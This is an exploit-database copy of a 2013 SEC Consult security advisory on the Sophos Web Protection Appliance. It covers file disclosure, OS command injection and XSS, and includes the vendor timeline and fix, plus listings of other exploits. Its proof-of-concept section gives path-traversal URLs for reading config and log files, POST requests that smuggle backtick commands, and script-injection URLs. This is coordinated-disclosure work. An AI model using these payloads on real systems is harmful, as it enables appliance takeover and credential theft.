Menu

Search for hundreds of thousands of exploits

"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities"

Author

Exploit author

"SEC Consult"

Platform

Exploit platform

linux

Release date

Exploit published date

2013-04-08

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
SEC Consult Vulnerability Lab Security Advisory < 20130403-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Sophos Web Protection Appliance
 vulnerable version: <= 3.7.8.1
      fixed version: 3.7.8.2
             impact: Critical
         CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643
           homepage: http://www.sophos.com/
              found: 2013-01-14
                 by: Wolfgang Ettlinger
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com

=======================================================================

Vendor/product description:
-----------------------------
"Our award-winning Secure Web Gateway appliances make web protection easy.
They are quick to setup, simple to manage and make policy administration a
snap, even for non-technical users."

URL: http://www.sophos.com/en-us/products/web/web-protection.aspx


Business recommendation:
------------------------
SEC Consult has identified several vulnerabilities within the components of
the Sophos Web Protection Appliance in the course of a short crash test. Some
components have been spot-checked, while others have not been tested at all.

An attacker can get unauthorized access to the appliance and plant backdoors or
access configuration files containing credentials for other systems (eg. Active
Directory/FTP login) which can be used in further attacks.
Since all web traffic passes through the appliance, interception of HTTP as
well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use),
including sensitive information like passwords and session Cookies is possible.
If HTTPS Scanning is enabled, the appliance holds a private key for a
Certificate Authority (CA) certificate that is installed/trusted on all
workstations in the company. If this private key is compromised by an attacker,
arbitrary certificates can be signed. These certificates will then pass
validation on the client machines, enabling in various attacks targeting
clients (MITM, phishing, evilgrade, ...).

The recommendation of SEC Consult is to switch off the product until a
comprehensive security audit based on a security source code review has been
performed and all identified security deficiencies have been resolved by the
vendor.

Vulnerability overview/description:
-----------------------------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
Unauthenticated users can read arbitrary files from the filesystem with the
privileges of the "spiderman" operating system user. These files include
configuration files containing sensitive information such as clear text
passwords which can be used in other attacks.
Furthermore the webserver log file which holds valid PHP session IDs can be
accessed. With this information administrator users can be impersonated.

2) OS command injection (CVE-2013-2642)
Authenticated users can execute arbitrary commands on the underlying
operating system with the privileges of the "spiderman" operating system user.
This can be used to get persistent access to the affected system (eg. by
planting backdoors), accessing all kinds locally stored information or
intercepting web traffic that passes through the appliance.
Unauthenticated users can exploit this kind of vulnerability too (depends on
appliance configuration).

3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)
Reflected Cross Site Scripting vulnerabilities were found. An attacker can use
these vulnerabilities the exploit other vulnerabilities in the web interface
or conducting phishing attacks.


Proof of concept:
-----------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
As an example, an unauthenticated user can download the configuration file
containing the salted hash of the administrator password as well as clear text
passwords e.g. for FTP backup storage or Active Directory authentication:

https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00

Furthermore the Apache access log can be retrieved. As PHP session IDs are
passed via the URL rather than via Cookies, these can be found in this log
file and effectively used to impersonate administrator users:

https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00

An excerpt from the log file shows that it contains PHP session ID information
(parameter "STYLE").
<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153"
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"


2) OS command injection (CVE-2013-2642)
The "Diagnostic Tools" functionality allows an authenticated user to inject
arbitrary operating system commands enclosed in backticks (`). These commands
are run with the privileges of the operating system user "spiderman":

POST /index.php?c=diagnostic_tools HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 92
Cache-Control: no-cache

action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60


The "Local Site List" functionality allows injection of arbitrary OS commands:

POST /index.php?c=local_site_list_editor HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 205

STYLE=<valid session
id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]

Note: Unauthenticated users can retrieve valid session IDs using the
vulnerability in 1).

If a customized template for the "Block page" uses the variable
"%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the
following URL:

https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60


3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)
The following URLs demonstrate reflected Cross Site Scripting vulnerabilities:

https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E
https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d
https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E
https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E

As the application uses URL parameters to transmit session IDs and rather
than cookies, session stealing attacks cannot be executed using these flaws.
However, these vulnerabilities can still be used to fake login pages for
phishing purposes.
Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the
XSS vulnerabilities. This enables attacks on the appliance even when the
web interface would otherwise not be reachable to the attacker.

Possible attack scenario:
Use XSS to run malicous Javascript in the browser of a user who has network
access to the web interface. This code can:
- Exploit the local file disclosure vulnerability (see 1) in order to gain
  access to valid session IDs and impersonate administrator users.
- Exploit the OS command injection (see 2) in order to execute arbitrary
  commands on the system.
- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the
  private key for the CA certificate used for HTTPS scanning (MITM).


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the Sophos Web Protection
Appliance version 3.7.8.1, which was the most recent version at the time of
discovery.


Vendor contact timeline:
------------------------
2013-02-22: Sending advisory and proof of concept exploit via encrypted
            channel.
2013-02-23: Vendor acknowledges receipt of advisory.
2013-03-01: Vendor confirms reported issues and provides preliminary
            information about release dates.
2013-03-07: Conference call: Addressing the risks the discovered
            vulnerabilities pose to customers and release schedule.
2013-03-18: Vendor starts rollout of update to "a first group of customers".
2013-04-03: SEC Consult releases coordinated security advisory.


Solution:
---------
Update to Web Protection Appliance version 3.7.8.2.

More information can be found at:
http://www.sophos.com/en-us/support/knowledgebase/118969.aspx


Workaround:
-----------
No workaround available.


Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
http://blog.sec-consult.com


EOF Wolfgang Ettlinger, Stefan Viehböck / @2013
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2019-09-13 "LimeSurvey 3.17.13 - Cross-Site Scripting" webapps php "SEC Consult"
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2018-08-16 "Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "SEC Consult"
2018-07-13 "Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure" webapps php "SEC Consult"
2018-07-13 "WAGO e!DISPLAY 7300T - Multiple Vulnerabilities" webapps php "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Privilege Escalation" local hardware "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Local Root Jailbreak" local hardware "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
2018-04-24 "WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting" webapps java "SEC Consult"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2018-03-05 "ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection" webapps php "SEC Consult"
2017-12-07 "OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting" webapps php "SEC Consult"
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-10-18 "Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities" webapps php "SEC Consult"
2017-05-09 "I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting" webapps php "SEC Consult"
2017-03-22 "Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-03-01 "Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting" webapps xml "SEC Consult"
2016-10-11 "RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection" webapps xml "SEC Consult"
2016-09-22 "Kerio Control Unified Threat Management 9.1.0 build 1087/9.1.1 build 1324 - Multiple Vulnerabilities" webapps php "SEC Consult"
2016-07-25 "Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities" webapps java "SEC Consult"
2016-02-10 "Yeager CMS 1.2.1 - Multiple Vulnerabilities" webapps php "SEC Consult"
2015-12-10 "Skybox Platform < 7.0.611 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-06-30 "Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-14 "Ansible Tower 2.0.2 - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2014-12-23 "GParted 0.14.1 - OS Command Execution" local linux "SEC Consult"
2014-12-23 "NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-11-06 "Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.